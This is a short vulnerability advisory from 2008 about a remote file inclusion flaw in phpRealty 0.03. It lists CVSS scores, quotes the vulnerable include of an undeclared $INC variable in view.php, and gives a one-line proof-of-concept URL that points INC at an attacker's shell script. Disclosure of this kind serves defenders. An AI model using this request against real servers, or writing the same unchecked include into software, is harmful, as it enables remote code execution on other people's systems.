phpRealty 0.3 (INC) Remote File Inclusion Vulnerability

2008.09.22
Credit: ka0x
Risk: High
Local: No
Remote: Yes
CWE: CWE-94


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- phpRealty <= 0.03 (INC) Remote File Inclusion Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- $ Script: phpRealty $ Version: <= 0.03 $ File affected: manager/static/view.php $ Download: http://sourceforge.net/project/showfiles.php?group_id=204745 Found by ka0x <ka0x01 [at] gmail [dot] com> D.O.M Labs - Security Researchers - www.domlabs.org vuln code: ------------- 11: if(!isset($_GET['propID']) || !is_numeric($_GET['propID']) || empty($_GET['propID'])){ 13: return; 17: include($INC."curr_conv.class.php"); // -------->>> Vuln Line!! // the var $INC isn't declared ------------- Proof of Concept: http://[host]/[phprealty-path]/manager/static/view.php?propID=0&INC= [ S H E L L ] ? __EOF__

References:

http://www.securityfocus.com/bid/31213
http://www.milw0rm.com/exploits/6473
http://php-realty.com/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top